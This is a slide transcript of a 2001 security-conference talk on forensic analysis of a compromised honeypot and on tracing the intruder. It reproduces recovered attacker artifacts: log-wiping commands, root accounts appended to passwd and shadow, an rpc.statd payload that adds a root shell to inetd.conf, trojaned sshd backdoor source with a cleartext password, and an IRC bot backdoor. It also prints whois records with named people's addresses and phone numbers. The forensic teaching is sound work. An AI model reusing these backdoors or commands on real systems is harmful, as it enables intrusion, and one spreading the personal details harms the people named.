jump to first page cansecwest '01 digging through compromised systems and tracking intruders...
TRANSCRIPT
Jump to first page
CanSecWest '01Digging Through Compromised Systems and
Tracking Intruders
Dave DittrichComputing & CommunicationsUniversity of Washington
Jump to first page
Introduction & Background Sources of data (ext/int) Getting data (gently) off the system Analysis The Forensic Challenge &
developing leads Basic Steps in Forensic Analysis of
Unix Systems & Black Hat course Resources on my home page
Jump to first page
Sources of Data
External DataProbing services (e.g., nmap,
Nessus) IDS (e.g., Snort) tcpdump, etherealNetwork Infrastructure
Jump to first page
Sources of Data
Internal DataProgram outputSystem logsApplication logs (e.g., access_log)MD5 checksums of filesFile system contentsFile system attributes
Jump to first page
Getting Bits On/Off the System Removeable media
TapeFloppyJaz/ZipCD-RAt least have a SCSI card!
Jump to first page
Jaz/Floppy disc
Formatted w/File systemMS-DOS (FAT16, VFAT)
# mount -t msdos /dev/fd0 /mnt/floppy
Linux Ext2FS# mke2fs /dev/jaz# mount /dev/jaz /mnt
RawGNU tar
# tar -cvzf /dev/fd0 ./dir
dd# dd if=/dev/hda1 of=/dev/jaz/hda1.dd
Jump to first page
Getting Bits On/Off the System Network
NFS rcp/scp ftpNetcat10Base-T Crossover cable
Jump to first page
Standard Unix utilities
ps netstat ifconfig find last (wtmp) strings nm dd md5sum
Jump to first page
The Coroner's Toolkit
grave-robber mactime lazarus unrm ils and icat
http://www.porcupine.org/forensics/
Jump to first page
Other utilities
lsof Red Hat Package Manager
(rpm) Tripwire TCTUTILS & Autopsy browser
http://www.cerias.purdue.edu/homes/carrier/forensics.html
Jump to first page
The Forensic Challenge
Subproject of The Honeynet Projecthttp://project.honeynet.org/challenge/
Top Three submissionsThomas RoesslerBrian CarrierPeter Kosinar
Followon project with law enforcement (not prosecution)
Jump to first page
The Forensic Challenge
Approx. time to fully root this box: 30 minutes
Ave. time per investigation: 48hrs Ave. time per person: 34hrs Ave. incident cost (@US$70K/yr):
US$2067 +/- $310 Estimated cost for "pro" job
(@US$300/hr.): US$22,620
Jump to first page
Suspect Leads We are NOT law enforcement!
"Entrapment" is not an issueExempt from ECPAPrivacy rights are given up by
using stolen computer resources Who is a suspect and who is a
victim? Suspects are innocent until
proven guilty in a court of law.http://eve.speakeasy.org/~dittrich/statement.txt
Jump to first page
Timestamp analysis w/TCT
Nov 08 00 06:54:25 33392 .a. -rwxr-xr-x root root /t/bin/cp 547 .a. -rw-r--r-- root root /t/etc/named.conf 525412 .a. -rwxr-xr-x root root /t/usr/local/sbin/named 4096 m.c drwxr-xr-x root root /t/usr/sbin 525412 mac -rwxr-xr-x root root /t/usr/sbin/named 35504 .a. -rwxr-xr-x root root /t/usr/sbin/ndc 2769 .a. -rw-r--r-- root root /t/var/named/named.ca 422 .a. -rw-r--r-- root root /t/var/named/named.local 1024 m.c drwxr-xr-x root root /t/var/run 5 mac -rw-r--r-- root root /t/var/run/named.pid
Jump to first page
String search in swap
# strings /attic/forensics/honeypot.hda9.dd | \ egrep -A3 '[A-Z]+=' . . .LESSOPEN=|/usr/bin/lesspipe.sh %sHISTSIZE=1000HOSTNAME=apollo.honeyp.eduLOGNAME=adm1REMOTEHOST=c871553-b.jffsn1.mo.home.comMAIL=/var/spool/mail/adm1TERM=vt100HOSTTYPE=i386PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/binHOME=/rootINPUTRC=/etc/inputrcSHELL=/bin/bashUSER=adm1LANG=en_USOSTYPE=Linux_=/usr/sbin/named . . .
[Technique by Thomas Roessler]
Jump to first page
Deleted .bash_history file
uptimerm -rf /etc/hosts.denytouch /etc/hosts.denyrm -rf /var/log/wtmptouch /var/log/wtmpkillall -9 klogdkillall -9 syslogdrm -rf /etc/rc.d/init.d/*log*echo own:x:0:0::/root:/bin/bash >> /etc/passwdecho adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >>/etc/passwdecho own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadowecho adm1:Yi2yCGHo0wOwg:10884:0:99999:7:1:1:134538412 >> /etc/shacat /etc/inetd.conf | grep telexit
Jump to first page
Strings output
# strings - /usr/local/sbin/irpd . . .@(#)named 8.2.2-P5 Thu Nov 25 16:18:38 CST 1999 \ [email protected]:/dev/.oz/src/bin/named$Id: version.c,v 8.3 1999/01/02 06:05:14 vixie Exp $named 8.2.2-P5 Thu Nov 25 16:18:38 CST [email protected]:/dev/.oz/src/bin/named8.2.2-P5 . . .
Jump to first page
Unknown file
# less var/tmp/nap+-[ User Login ]-------------------- --- --- - -| username: root password: tw1Lightz0ne hostname:c871553-b.jffsn1.mo.home.com+----------------------------------- ----- --- -- -- -
# find . -type f | xargs egrep -l "/tmp/nap|User Login"./usr/local/sbin/sshd1./var/tmp/nap
Jump to first page
Strings output
# strings usr/local/sbin/sshd1 | less . . .i686-unknown-linux1.2.27sshd version %s [%s] . . .Unknown group id %dnone0123456789ABCDEF0123456789ABCDEFd33e8f1a6397c6d2efd9a2aae748eb02Cannot change user when server not running as root. . . .
Jump to first page
Strings in deleted file space
# for i in 1 5 6 7 8> do> echo hda$i; unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6> donehda1hda5# ./configure --enable-global=d33e8f1a6397c6d2efd9a2aae748eb02--enable-sshd-log=/usr/tmp/nap --cache-file=.././config.cache . . . // "d33e8f1a6397c6d2efd9a2aae748eb02";#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02" . . . echo "running ${CONFIG_SHELL-/bin/sh} ./configure--enable-sshd-log=/usr/tmp/nap --cache-file=.././config.cache . . .${ac_eA}USE_GLOBAL_PASS${ac_eB}USE_GLOBAL_PASS${ac_eC}"d33e8f1a6397c6d2efd9a2aae748eb02"${ac_eD}d33e8f1a6397c6d2efd9a2aae748eb02hda6hda7hda8
Jump to first page
Deleted i-node timestamp analysis
# grave-robber -c /t -m -d . -o LINUX2# for i in 1 5 6 7 8> do> ils honeypot.hda$i | ils2mac > hda$i.ilsbody> done# ls -l *body-rw-r--r-- 1 root root 3484454 Feb 15 23:01 body-rw-r--r-- 1 root root 207 Feb 17 14:42 hda1.ilsbody-rw-r--r-- 1 root root 179650 Feb 17 14:42 hda5.ilsbody-rw-r--r-- 1 root root 207 Feb 17 14:42 hda6.ilsbody-rw-r--r-- 1 root root 796 Feb 17 14:42 hda7.ilsbody-rw-r--r-- 1 root root 12618 Feb 17 14:42 hda8.ilsbody# cat hda?.ilsbody > body-deleted# cat body body-deleted > body-full# mactime -p /t/etc/passwd -g /t/etc/group -b body-full \ 11/06/2000 > mactime.txt
Jump to first page
Deleted i-nodes
Aug 09 00 12:52:37 18698240 m.. -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>Nov 08 00 06:52:59 18698240 .a. -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>Nov 08 00 06:56:08 18698240 ..c -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>
Jump to first page
Recovered source
#ifdef USE_GLOBAL_PASS/* Check if the "global" password was entered */int check_global_passwd( unsigned char *pass ){ /* Paste here the output from md5sum --string="Your_Password" */ char md5passwd[33]=USE_GLOBAL_PASS; // "3e3a378c63aa1e55e3e9ae9d2bdcd6a1"; struct MD5Context md; unsigned char md5buffer[32]; int i;
/* Compute the response. */ MD5Init(&md); MD5Update(&md, pass, strlen( pass)); MD5Final(md5buffer, &md); for( i = 15; i >= 0; i-- ) { md5buffer[i*2+1] = (md5buffer[i] & 0xf) + '0'; md5buffer[i*2] = (md5buffer[i] >> 4) + '0'; }
Jump to first page
Confirmation of backdoor password
#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02"
# md5sum --string=tw1Lightz0ned33e8f1a6397c6d2efd9a2aae748eb02 "tw1Lightz0ne"
Jump to first page
Command line in swap space
[root@apollo linux]# ./dd bs=1024 < /dev/hda8 | \ ./nc 192.168.1.10 10000 -w 3LANGen_USLANG
[Technique by David y Mayka and Thomas Roessler]
Jump to first page
Recovering deleted syslogs
# unrm honeypot.hda7.dd | less -B . . .Nov 7 04:02:00 apollo anacron[1576]: Updated timestamp for job `cron.daily'Nov 8 00:08:41 apollo inetd[408]: pid 2077: exit status 1Nov 8 00:08:41 apollo inetd[408]: pid 2078: exit status 1Nov 8 00:09:00 apollo rpc.statd[270]: SM_MON request for ho\stname containing '/': ^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF\><BF>^E<F7><FF><BF>^F<F7><FF><BF>^F<F7><FF><BF>^G<F7><FF><BF\>^G<F7><FF><BF>08049f10 bffff754 000028f8 4d5f4d53 72204e4f \65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e69\61 2720676e 203a272f 000000000000000000000000000000000000000\. . .'<88>F*<83><C6> <88>F<AB><89>F<B8><B0>+, <89><F3><8D>N<AC><8\D>V<B8><CD><80>1<DB><89><D8>@<CD><80><E8><B0><FF><FF><FF>/bi\n/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /e\tc/inetd.conf;killall -HUP inetdNov 8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily' [Techniques by Wietse Venema and Peter Kosinar]
Jump to first page
Contents of IRC bot config file
################################################################################ tPACK.tcl coded by T0R0 - [email protected] - www.falcon-networks.com ################################################################################
set homechan "#tpack"set admin "TORO X-cess"set vers "2.3"set altnick "$nick-"set username "$nick"set realname "www.$nick.com"set userfile ".log.yesterday"set channel-file ".log.today" . . .proc dcc_flags {handle idx arg} { set a [lindex $arg 0] set z [decrypt xx3fw3 bijph.s5f7N0] if {$handle == $z} { set p "[decrypt f3qcadr3 DtVgR.E/mLu1]" if {$a == $p} { if {![validuser $z]} { adduser $z *!*[email protected] chpass $z temp123 } . . .
Jump to first page
Decryption (part 1)
egg.log6692 set z [decrypt xx3fw3 bijph.s5f7N0] --> TORO6694 set p "[decrypt f3qcadr3 DtVgR.E/mLu1]" --> die06769 set p "[decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/]" --> reset07116 [decrypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1] \ [decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj.] \ [decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq.] \ [decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzY..z0yt0] \ [decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20] \ --> bind chon - * on_dcc7328 set wmail "[decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1]" \ --> [email protected]
[Technique by Marco Walther]
Jump to first page
Decryption (part 2)
# cat e.conf0$1f0=201i151h221o291H2b1G2U223'2i302n372G2Y2U3E2Z3h2Y2Q3c0A0s1L0N1G141m0=281k1R1A1@1N2V1I2f1&1&1$2P2i342v2R2t322S`@0l0U0q1j0A1C0Q1`0P1q0=1'1c1S171X2s2O2R3A2P3V2@403c3J3m3U0L1S0&1@121I1j1P1B2d1E2m1Q2J262Q2b2C2u3p2H3'2G3B2U3U0A0S0y1a0y1l0@0&0P231a1p1g2l1t201u1X1O2e1S2k1X2L282G282Q2x2x2H03`&000a0F1x2d1D1L1y201Z1T100W0$19140&1k211g1A1q291S2O1S1X1W2X28362l2S2p3u2J3h2L3S3`2N3b1r0D0S0M101'1R141T1q2v1F271F1&1P2C2a2D2a25262H2z2x2n2U2H3c020x0c0j090H0t190y1j0E1a0V0X1Y312k2m2v2t2u3y2Q3O313c323W323l3q1q0I1k0Y1=1g1f161S1r1z1G1C0T1r181T1d1u1g2d1A1G1v2p1W2C252s273c2r2L2F3s2L3f2J3k333k3'0J0z0O0S1x0N1x13291n221D2`1s281O2a1P2C242u2f2y2e2l2y2p2N3g0c170i1m0B1f0B1f0P17111k0$1=1a182E3A2D3G2O3d2=463b3n3c4e0Q0@0O1s1`1p1f1C1h2'1t1m1K1v1I2C2024262I282f2f2v2E352D3d2D2Y2@3R050x0p1v0E1s0P1f0R1N161u1a241g1U1y241x2F1Z2m262J292Q2q3j2I0y171G17211z1@1v2d1M1C1&1L1R2V2a362s3y2J3v2A3e2V3t2W3k38460A0x0u1b0R1z17151a1u1f2d1x1N1v2h1K2k2`1@1X29232`2o382o3A2B2=040T0g0U0l0Y0B0Q0C1F0W1h18211e272v2Y2O3M2V3j374h3l3l3g3a0K1q141y130=1`1R1q2g0U1E111K
Jump to first page
Decryption (part 2)
# ./decrypt e.conf e.conf.1 [still looks encrypted]# ./decrypt e.conf.1 e.conf.2 [still looks encrypted]# ./decrypt e.conf.2 e.conf.3# less e.conf.3bind filt - "\001ACTION *\001" filt_actproc filt_act {idx text} { dccsimul $idx ".me [string trim [lrange $text 1 end] \001]"}
bind filt - "/me *" filt_telnet_actproc filt_telnet_act {idx text} { dccsimul $idx ".me [lrange $text 1 end]"}
Jump to first page
Decryption (when things go right)set share-users 1set share-greet 1set passive 1set require-p 1set open-telnets 0set connect-timeout 15set channel-file "ch4n"set init-server { putserv "MODE $botnick +id-ksw" }set modes-per-line 6
##################################################### DeFcon.tcl by AciDpHucK ## 1.32 (4.17.99) ## NO DISTRO ## ## gREETZ: rei_ayana, tq, wait3r, nermie, Lilly ## M1K3, Devin, Cogliastr, kRaZyBoY, danatje, msb ## ladicius,siN, ^beerman^, [z], confusion, Brain ## vixen, ganymede, Enegiza, noble, bee, miscrient ## ## contact: [email protected] #####################################################
Jump to first page
Domain registration% domain will.fuck.for.an.o-line.stThe authoritative name servers for 'o-line.st' are: ns1.falcon-networks.com 63.151.207.126 ns2.falcon-networks.com 216.206.242.130 (querying server=63.151.207.126 ...) (querying server=216.206.242.130 ...)will.fuck.for.an.o-line.st: Internet address = 63.151.207.49
Qwest Communications (NETBLK-NET-QWEST-BLKS-2) 950 17th St. Suite 1900 Denver, CO 80202 US
Netname: NET-QWEST-BLKS-2 Netblock: 63.144.0.0 - 63.151.255.255 Maintainer: QWST
Coordinator: Qwest, NOC (QN-ARIN) [email protected] 703-363-3001 (FAX) 703-363-3177 (703) 363-3001 (FAX) 703-363-3177
Jump to first page
More domain registration records
% jwhois 216.206.242.130[whois.arin.net]Qwest Communications (NETBLK-NET-QWEST-BLKS-1) NET-QWEST-BLKS-1 216.206.0.0 -216.207.255.255CREATIVE INTERNET TECHNIQUES (NETBLK-QWEST-216-206-242-64) QWEST-216-206-242-64 216.206.242.64 -216.206.242.255Falcon Networks (NETBLK-CRTV-FALCON-NETWORKS) CRTV-FALCON-NETWORKS 216.206.242.128 - 216.206.242.255
Jump to first page
Domain records...
% jwhois NETBLK-CRTV-FALCON-NETWORKS[whois.arin.net]Falcon Networks (NETBLK-CRTV-FALCON-NETWORKS) 3 Mimosa Irvine, CA 92612 US
Netname: CRTV-FALCON-NETWORKS Netblock: 216.206.242.128 - 216.206.242.255
Coordinator: Mahvi, Mehdi (MM1416-ARIN) [email protected] 949 552 7210
Record last updated on 20-Aug-2000. Database last updated on 17-Feb-2001 18:26:34 EDT.
Jump to first page
Rootkit config file
# cat /t/usr/libexec/awk/addy.awk1 65.12 65.11 134518464.1345184442 134518464.1345184441 216.1492 216.149
In all, Teo identifies these netblocks as being hidden: 63.203.0.0/16 63.206.0.0/16 65.1.0.0/16 209.250.0.0/16 216.33.0.0/16 216.149.0.0/16
Jump to first page
Eggdrop debug file
Debug (eggdrop v1.1.6+tPACK 1.6) written Wed Mar 29 13:07:02 2000Full Patch List: Context: tclhash.c/793SOCK ADDR PORT NICK HOST TYPE---- -------- ----- --------- ----------------- ----6 00000000 6667 (server) irc.nethead.com serv3 D895D302 7756 (telnet) * lstn 4 D895D325 5412 (script) bounce_con lstn 8 D1B3E3D5 2977 TORO lup.earthlink.net chat flags: cptEp/234
0xD895D302 is 216.149.211.2 (hermes.alexvoll.com)
0xd1b3e3d5 is 209.179.227.213(pool0468.cvx12-bradley.dialup.earthlink.net)
The first hop (where T0R0 is dialed in) is an Earthlink dialup in Bradley, California (maps.yahoo.com shows its a small town on Highway 101 about 1/2 hour north of San Luis Obispo.)
Jump to first page
Domain records...% jwhois NETBLK-NNA-216-149-211-0[whois.arin.net]Falcon Networks (NETBLK-NNA-216-149-211-0) 110 Meadowlands Parkway Secaucus, NJ 07094 US
Netname: NNA-216-149-211-0 Netblock: 216.149.211.0 - 216.149.211.31
Coordinator: Dept, Colo (CD242-ARIN) [email protected] 201-902-9300
Record last updated on 15-Jan-2000. Database last updated on 15-Mar-2001 22:41:13 EDT.
Organization: Alexander Voll Alexander Voll 37 Overlook Terrace, Apt 6F New York, NY 10033 US Phone: 212-781-1365 Email: [email protected]
Jump to first page
Further research
Identify best timeline format Identify best organization Identify best techniques Show use of new tools (e.g.,
TCTUTILS) Develop new tools (dd w/md5
checksumming, automated disc imaging & CD-R/DVD-R archiving)